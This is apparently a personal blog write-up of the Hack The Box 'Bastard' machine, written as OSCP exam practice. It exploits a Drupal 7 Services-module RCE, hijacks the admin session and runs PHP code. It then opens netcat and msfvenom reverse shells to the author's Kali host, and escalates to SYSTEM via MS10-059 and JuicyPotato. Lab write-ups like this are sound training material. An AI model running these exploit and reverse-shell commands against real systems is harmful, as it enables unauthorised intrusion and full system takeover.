Hack The Box: Bastard Write-up (#33)

This is my 33rd box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

As usual, run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.9
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535

We get the back the following result:

  • 80: — Running HTTP service, Microsoft IIS httpd 7.5
  • 135: — Running Microsoft Windows RPC
  • 49154: — Running Microsoft Windows RPC
Nmap scan report for ip-10-10-10-9.ap-southeast-1.compute.internal (10.10.10.9)
Host is up (0.0089s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
...

Before we begin enumeration, let’s do quick mental notes.

  1. Port 80 is running Microsoft IIS service version 7.5 which is associated with Windows 7 or Windows Server 2008 R2 Operation System (OS). The link for this info can be found here. It hosting Drupal version 7. Most likely this will be our entry point to the box.
  2. Port 135 and 49154 are associated with Microsoft RPC service. We can do the basic enumeration with Nmap NSE script.

Service Enumeration

Port 80 (HTTP service)

Let’s visit the page.

I tried to login with common and weak credentials but not working. Let’s run a dirsearch.

python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php
  • -u: Target URL
  • -w: Wordlist
  • -e: File extension

We get back the following results.

[13:20:16] Starting: 
[13:24:23] 400 - 324B - /%ff/
[13:24:24] 200 - 8KB - /%3f/
[13:24:29] 200 - 7KB - /0
[13:53:02] 200 - 108KB - /changelog.txt
[14:18:49] 301 - 150B - /includes -> http://10.10.10.9/includes/
[14:19:42] 200 - 7KB - /index.php
[14:20:26] 200 - 2KB - /install.mysql.txt
[14:20:26] 200 - 2KB - /install.pgsql.txt
[14:20:30] 200 - 18KB - /install.txt
[14:20:31] 200 - 3KB - /install.php
[14:23:34] 200 - 18KB - /license.txt
[14:26:54] 200 - 9KB - /MAINTAINERS.txt
[14:29:40] 301 - 146B - /misc -> http://10.10.10.9/misc/
[14:30:16] 301 - 149B - /modules -> http://10.10.10.9/modules/
[14:32:37] 200 - 7KB - /node
[14:41:04] 301 - 150B - /profiles -> http://10.10.10.9/profiles/
[14:42:04] 200 - 5KB - /readme.txt
[14:42:44] 200 - 62B - /rest/
[14:42:51] 200 - 2KB - /robots.txt
[14:43:24] 301 - 149B - /scripts -> http://10.10.10.9/scripts/
[14:46:11] 301 - 147B - /sites -> http://10.10.10.9/sites/
[14:51:17] 301 - 148B - /themes -> http://10.10.10.9/themes/
[14:52:48] 200 - 10KB - /UPGRADE.txt
[14:53:29] 200 - 7KB - /user
[14:53:36] 200 - 7KB - /user/
[14:53:39] 200 - 7KB - /user/login/
[14:59:26] 200 - 42B - /xmlrpc.php

/changelog.txt normally we can get web application version info. Let’s visit it. We have Drupal version information.

Let’s check the exploits for this version after the release date. I come across this site which explains the vulnerability exists in the version of Drupal.

This particular Drupal version is vulnerable to remote code execution due to insecure use of unserialize() function in the service module.

Exploitation

Search for the exploits in searchsploit.

searchsploit drupal 7 remote code execution

Download the exploit.

searchsploit -m 41564.php

Let’s quickly review the code. The URL link to the same Drupal version vulnerability info as seen earlier.

https://www.ambionics.io/blog/drupal-services-module-rce# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
# along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
...

The steps are fairly simple. For the exploit to work we need the rest endpoint to activate. From the dirsearch result, there is one path /rest/ discovered. Probably this could be the one. Let’s access to it.

Seems like it is. Next, modify the exploit as below.

$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

Then execute the exploit.

php 41564.php

The exploit executed without any error. The exploit has created 2 files session.json and user.json.

# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/dixuSOspsOUU.php

Let’s check the contents of the user.json.

{
"uid": "1",
"name": "admin",
"mail": "drupal@hackthebox.gr",
"theme": "",
"created": "1489920428",
"access": "1599707255",
"login": 1599729403,
"status": "1",
"timezone": "Europe\/Athens",
"language": "",
"picture": null,
"init": "drupal@hackthebox.gr",
"data": false,
"roles": {
"2": "authenticated user",
"3": "administrator"
},
"rdf_mapping": {
"rdftype": [
"sioc:UserAccount"
],
"name": {
"predicates": [
"foaf:name"
]
},
"homepage": {
"predicates": [
"foaf:page"
],
"type": "rel"
}
},
"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"

It created an admin account with a hashed password. Let check the content of session.json as well.

{                                                                                                                                           
"session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
"session_id": "RW7tPSxNdc5UP8TPkKtSBzobkdBNpJKsmv318gHi56A",
"token": "k47rjRP3P-5SI2dlBQ9uOblKtfWqrUsiE6QhlYzKy3E"
}

Here we have a session cookie for the admin account. Let’s use cookie editor to key in these values to access as an admin.

Then refresh the page.

Nice! We’re successfully login as admin. Drupal has an option to add and execute PHP code. We can use this to get a reverse shell to Kali. To do that Go to Module tab and tick or enable PHP filter.

Then scroll down to the bottom of the page and click Save Configuration.

To add php code, click on Add Content on the Welcome page > Article or Basic Page. In my case, I selected Article option.

Add the following contents PHP upload and execute code. You can find it here. Make sure to add opening and closing PHP code and select the Text Format as PHP code.

Then click Save.

In my case, the entry is created under path /node/2.

Let’s test it out with windows command.

We’re authority\iusr user. Let’s execute systeminfo command.

Target is running Windows Server 2008 R2 Datacentre x64 version of OS. Next, set up a simple python web server.

root@kali:/htb/Bastard# python3 -m http.server 443

Let’s upload nc64.exe binary to the target machine. You can download the binary from here.

Binary uploaded successfully.

root@kali:/htb/Bastard# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.9 - - [11/Sep/2020 01:17:46] "GET /nc64.exe HTTP/1.0" 200 -
10.10.10.9 - - [11/Sep/2020 01:17:53] "GET /shell.php HTTP/1.0" 200 -

Now, set up a Netcat listener in your Kali Linux.

nc -nlvp 53

Execute the following commands from the browser.

nc64.exe -e cmd.exe 10.10.14.31 53

Go back to the listener and check if any connection received.

We got a shell! Grab the user flag.

Post-Exploitation Enumeration

Set up an SMB share with any share name. In my case, my share name is a tool. Here I placed all the enumeration scripts to make easy file transfer.

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .

From the target machine, run the following command to copy systeminfo to our Kali Linux machine.

systeminfo > //10.10.14.31/tools/systeminfo.txt

Once completed, download windows exploit suggester to find missing patch using systeminfo we collected.

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

Once done, update the database to automatically download the security bulletin database from Microsoft with the — update flag, and it will save as Excel spreadsheet.

./windows-exploit-suggester.py --update

Then run the following command.

/windows-exploit-suggester.py --database 2020-09-11-mssb.xls --systeminfo /htb/Bastard/systeminfo.txt

The results provide us with many known vulnerabilities for this Windows version. I tested few of them but non gives me SYSTEM shell except MS10–059.

Privilege Escalation

Download the MS10–059 compiled binary from here. Then copy to the target machine using the above SMB file share method.

Set up a Netcat listener on your Kali Linux.

nc -nlvp 443

Then execute the binary.

MS10-059.exe 10.10.14.31 443

Go back the listener.

We get a SYSTEM shell! Grab the root flag.

Extra Content

I used another method called Token impersonation to exploit this box. If we check the privilege of the nt authority\isur, SeImpersonatePrivilege is enabled.

By using a popular tool called JuicyPotato we can impersonate this account to SYSTEM privilege.

Download the binary file from here. Next, create an MSFVenom reverse shell payload.

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exe

Then transfer the JuicyPotato.exe and shell.exe file to the target machine.

Set up a Netcat listener on your Kali Linux.

nc -nlvp 53

From the target machine, run the following command.

JuicyPotato.exe -l 1337 -p C:\inetpub\drupal-7.54\shell.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
  • -t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
  • -p <program>: program to launch
  • -l <port>: COM server listen port
  • -c <{clsid}>: CLSID (default BITS:{4991d34b-80a1–4291–83b6–3328366b9097})

For CLSID list you can find here. For a different version of OS, you need that version of CLSID (any one from the list will do).

Go back to the listener.

We get a shell again.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Granny.

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.